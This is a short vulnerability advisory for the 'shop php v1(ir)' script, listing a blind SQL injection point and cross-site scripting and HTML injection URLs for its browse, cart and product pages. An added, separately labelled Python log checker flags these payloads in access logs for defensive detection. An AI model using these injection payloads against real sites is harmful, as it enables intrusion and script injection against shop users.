=================================================================
| # Title : shop php v1(ir) Multiple Vulnerabilities
| # Author : indoushka
| # Vendor : http://www.mspsoft.ir
================================================================
Blind SQL Injection :
localhost/shop-php/browse.php?catid=if&start=0 (inject here)
Cross site scripting :
/shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22
/shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22
XSS / HTML Inject :
http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22
Greetz :
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz * Gjoko 'LiquidWorm' Krstic
================================================================
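Added example (not part of the original advisory or the vendor's code): a log check that flags requests to the three scripts above whose parameters carry anything other than digits after percent-decoding. The script-to-parameter map comes from the URLs listed here; treating those parameters as non-negative integers is an assumption, and the log lines are constructed samples.

```python
from urllib.parse import urlsplit, parse_qsl

# Parameters taken from the advisory's requests. Treating them as plain
# non-negative integers is an assumption based on the values shown (28, 20, 0).
NUMERIC_PARAMS = {
    "browse.php": {"catid", "start"},
    "cart.php": {"new"},
    "product.php": {"productid", "start"},
}

def check_request(target):
    """Return [(param, decoded_value)] for numeric params holding non-digits."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    expected = NUMERIC_PARAMS.get(script, set())
    findings = []
    # parse_qsl percent-decodes, so %22 and %3C are compared as " and <.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in expected and not (value.isascii() and value.isdigit()):
            findings.append((name, value))
    return findings

def scan_access_log(lines):
    """Return [(client_ip, target, findings)] for combined/common log lines."""
    hits = []
    for line in lines:
        try:
            target = line.split('"')[1].split(" ")[1]  # "GET /path?q HTTP/1.1"
        except IndexError:
            continue  # malformed line: no quoted request field
        findings = check_request(target)
        if findings:
            hits.append((line.split(" ", 1)[0], target, findings))
    return hits

# Constructed sample log lines (documentation IPs, made-up timestamps);
# the request targets are the ones listed in the advisory plus one benign hit.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop-php/product.php?productid=20&start=0 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /shop-php/browse.php?catid=if&start=0 HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22 HTTP/1.1" 200 4312',
]

if __name__ == "__main__":
    for ip, target, findings in scan_access_log(SAMPLE_LOG):
        print(ip, target, findings)
```

The same integer check, applied in the application before the value reaches the SQL query or the HTML output, is the corresponding input-validation fix.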